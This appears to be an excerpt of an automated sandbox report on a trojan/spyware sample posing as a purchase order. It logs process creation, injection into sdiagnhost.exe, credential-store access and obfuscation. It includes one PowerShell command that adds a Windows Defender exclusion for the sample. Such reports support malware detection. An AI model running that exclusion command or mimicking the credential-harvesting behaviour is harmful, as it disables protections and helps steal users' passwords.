                Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04427E54 appears 102 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04415130 appears 58 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 0444EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO 20495088.exe Code function: String function: 017AF290 appears 105 times
                Source: C:\Users\user\Desktop\PO 20495088.exe Code function: String function: 01777E54 appears 102 times
                Source: C:\Users\user\Desktop\PO 20495088.exe Code function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO 20495088.exe Code function: String function: 0171B970 appears 278 times
                Source: C:\Users\user\Desktop\PO 20495088.exe Code function: String function: 01765130 appears 58 times
                Source: PO 20495088.exe, 00000000.00000002.2348800137.0000000005950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2337539369.000000000117E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2350834120.0000000007384000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2362771807.0000000007D70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2338435823.0000000002F93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs PO 20495088.exe
                Source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdiagnhost.exej% vs PO 20495088.exe
                Source: PO 20495088.exe, 00000006.00000002.2584440683.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO 20495088.exe
                Source: PO 20495088.exe Binary or memory string: OriginalFilenameSL.exe" vs PO 20495088.exe
                Source: PO 20495088.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 20495088.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, QLyBkiYt0Go5aKO1Up.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, QLyBkiYt0Go5aKO1Up.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: _0020.SetAccessControl
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: _0020.SetAccessControl
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@9/9
                Source: C:\Users\user\Desktop\PO 20495088.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 20495088.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxq3f4tx.mkz.ps1
                Source: PO 20495088.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\PO 20495088.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\PO 20495088.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: sdiagnhost.exe, 00000009.00000003.2774468384.0000000002831000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2768830043.0000000002804000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3898662883.0000000002824000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2768960277.0000000002824000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3898662883.0000000002854000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO 20495088.exe ReversingLabs: Detection: 39%
                Source: unknown Process created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Users\user\Desktop\PO 20495088.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PO 20495088.exe Process created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\PO 20495088.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO 20495088.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PO 20495088.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO 20495088.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO 20495088.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sKyuoUfZdk.exe, 00000008.00000000.2506589550.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3898414307.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdbSHA256 source: PO 20495088.exe
                Source: Binary string: wntdll.pdb source: PO 20495088.exe, PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdb source: PO 20495088.exe
                Source: Binary string: sdiagnhost.pdbGCTL source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs | .Net Code: yumIxaZLbc System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs | .Net Code: yumIxaZLbc System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0158E962 pushfd ; retf 0_2_0158E969
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0158F47A push eax; iretd 0_2_0158F481
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054FE5A4 push esp; retf 0_2_054FE5A9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00414982 pushfd ; retf 6_2_00414975
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004051D3 push ss; retf 6_2_004051D5
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004182C3 push edi; retf 6_2_004182CB
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00403360 push eax; ret 6_2_00403362
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00426B13 push es; iretd 6_2_00426BEB
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00414D3D push ebx; retf 6_2_00414D46
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0040BE37 push edi; ret 6_2_0040BE38
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00418EAA push edx; ret 6_2_00418EB9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0040D7AF push esp; iretd 6_2_0040D7B2
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F225F pushad ; ret 6_2_016F27F9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F27FA pushad ; ret 6_2_016F27F9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017209AD push ecx; mov dword ptr [esp], ecx 6_2_017209B6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F283D push eax; iretd 6_2_016F2858
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F9939 push es; iretd 6_2_016F9940
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_043D09AD push ecx; mov dword ptr [esp], ecx 9_2_043D09B6
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D0727 push edx; ret 9_2_001D0732
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001C2764 pushad ; ret 9_2_001C276C
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D0848 push ebp; ret 9_2_001D0849
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001B8AD4 push edi; ret 9_2_001B8AD5
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001C4F60 push edi; retf 9_2_001C4F68
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001C752C push edi; retf 0A6Eh 9_2_001C752B
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D37B0 push es; iretd 9_2_001D3888
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001BD800 push eax; iretd 9_2_001BD82C
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001C19DA push ebx; retf 9_2_001C19E3
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001CDA70 push esi; retf 9_2_001CDA7B
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001CDA6E push esi; retf 9_2_001CDA7B
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001C5B47 push edx; ret 9_2_001C5B56
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001B1E70 push ss; retf 9_2_001B1E72
                Source: PO 20495088.exe | Static PE information: section name: .text entropy: 7.977130763165481
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LFRYuTGvWOMHuIMSMI.cs | High entropy of concatenated method names: 'H9KkVS3009', 'wxdkbtvLcC', 'liSkmDofnt', 'YBkkN2iil5', 'PjcvAq8W16K1x12waLK', 'GeC4Rt8DRQr1OsH9FZL', 'ih5TQ88ScZRBVFyAIuY'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, pnLbb94JCMiLfVIuHb.cs | High entropy of concatenated method names: 'p2e4UMZ2uu', 'TlE49CJ1eZ', 'o2W4i74ku8', 'GcU4CKRtbb', 'idt486GQRG', 'sqc4Syuo89', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, FBMo2BQar0VrdJhNfA.cs | High entropy of concatenated method names: 'mpIkf4bXOA', 'w8OkYG9MUl', 'NWCkGUEoUY', 'whykjaqsvs', 'HANkrnaJrQ', 'Kq6ke6xmnF', 'fkrkptRbcy', 'v4yk05v7Lw', 'gYBkWX41xI', 'reJkJLd84Y'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, bPWVTiE5Z9HKxopMdc.cs | High entropy of concatenated method names: 'pojcb7stAW', 'voVcNiJNbu', 'oRcvwTblRj', 'relvsbXOOE', 'tvBcy7wxDd', 'Os9cYc4YLZ', 'Vctc3nifeE', 'AoKcGRfn6k', 'jvAcj3VvdX', 'xDpc5QgQ2y'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, tyALKZSpnBFiSHeyWo.cs | High entropy of concatenated method names: 'tbZxgwXRS', 'aIJZShBtK', 'eANqaUtU6', 'JSD7esr61', 'KnRAxWPWE', 'poIXLfcGo', 'loX9qtxJu2Hvh3Evhq', 'Pmb9gKcUOx15hv6YTb', 'Dd3vtQuRJ', 'xiI4OMn2F'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LaABg007jsrdOW4gMH.cs | High entropy of concatenated method names: 'cPZiTYSMFq', 'xtRiueQjds', 'BK0i9LSE6l', 'IY5iCY4pP8', 'NAOiS2Fgsg', 'lvl9MVAcPI', 'VcZ92Xrego', 'p5H9VXhaw1', 'FT19bH72de', 'yFT9m9jasf'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LXh1rrbtkEYvTPYdLc.cs | High entropy of concatenated method names: 'oAB9QaMIUf', 'NWF975udC9', 'Y8AUeEqfsW', 'SW0UpbLHKr', 'R7CU0tIRta', 'S47UWlTIxj', 'VSFUJXLGiG', 'uqHURw66T6', 'TqRUEOhVyG', 's3RUfAUOFQ'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, ClpgZZH8XG7DZVYVUb3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bj7O8myEBn', 'inMO40uy0M', 'rdeOB4fo3c', 'q3COO0ps60', 'nkyOP8BaUP', 'FImOtOm0bI', 'e51OKY4D6v'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, EbZ842HBJFhIslYw36j.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKo4yEWFaQ', 'G244YqmJKA', 'Log43C3XbE', 'Etk4GGNClC', 'ytr4jLNgwd', 'Xq445WLDCE', 'sDF4DZAesj'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, gaLxhIcHqu4ohILFAv.cs | High entropy of concatenated method names: 'aqhcgdfuIe', 'XLqcFrJwKm', 'ToString', 'ocncdlpX6c', 'bLRcuPsTO7', 'zs3cUtPW0D', 'i78c9cdoJP', 'pxDci36vZl', 'W91cCHABym', 'xTqcStLoqn'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, dK3DXQMMhvybSpbFoC.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cV7hmGmSPH', 'tMchNYJ0fp', 'VoghzNVgEd', 'K58LwEARN3', 'OhfLs5LcLx', 'e9vLhHMfFf', 'P4PLLvG7IT', 'AJ6M9AhZ4KLbTX44wae'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yMIQ06HHsgARpgeyFLZ.cs | High entropy of concatenated method names: 'KZk4NQ5Owq', 'Pog4zA1njb', 'gIMBwEiV7W', 'SaABswgDl1', 'esNBhV70UW', 'VTQBLItraf', 'OyyBIXnS7o', 'fQsBTAPmNJ', 'dTfBdyhhe1', 'tXKBuNUhjf'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, mIoZEuiKSLqGc1eeFE.cs | High entropy of concatenated method names: 'FKc8oYprtW', 'Nkv8rv5b4P', 'rOb8e64DxA', 'wsK8puqCc9', 'Lfw80Xb9sN', 'bdW8WMYmkT', 'DCV8Jy6ZFq', 'TqU8R89Sj6', 'gSs8EDRWfk', 'LNq8fUC0Ws'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, NwCEPEzrFnkLU98RAF.cs | High entropy of concatenated method names: 'kR74q2EQG7', 'bGO4nDjRl9', 'Dew4A0FpS0', 'v9f4ogHf8E', 'DWU4rvUcot', 'VCf4pfCUMl', 'Siw40YnfkO', 'wU84KiE4QB', 'Xs74aZ0OG1', 'tUH41FSZqt'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, Tg6XRevX7i4KRsbMD0.cs | High entropy of concatenated method names: 'tTQCaNFUqj', 'cWFC1Er6My', 'MTnCx6N7Vm', 'LQjCZKcX7K', 'h42CQ1340N', 'bFUCqeBIJQ', 'ufaC7aWp74', 'IhmCn5I2ZO', 'otNCAF8WHJ', 'oIVCX93IS1'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, iWSyLI8pVFVVT202jS.cs | High entropy of concatenated method names: 'tF6sCAb3ZX', 'aQDsS4IKds', 'tgFsgF0P93', 'SZ5sFef87o', 'axeskZmvhe', 'VF6s6gNrLS', 'rH9bSlHcsu1TPvtdiC', 'QyuZdmA6kwYHpZXOSx', 'mZ4ss6NI4S', 'zkWsLThF85'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, WcY88HmRHGlKXLbZmw.cs | High entropy of concatenated method names: 'F9wlnxSRfV', 'iJolAY5nBW', 'l0YloUx8Ps', 'oPPlrpCPQq', 'J9plp3udUp', 'dRZl0x7UKA', 'de5lJSlt2m', 'WJtlRNwVft', 'v6plf0QIPs', 'qHqly0R0Jb'
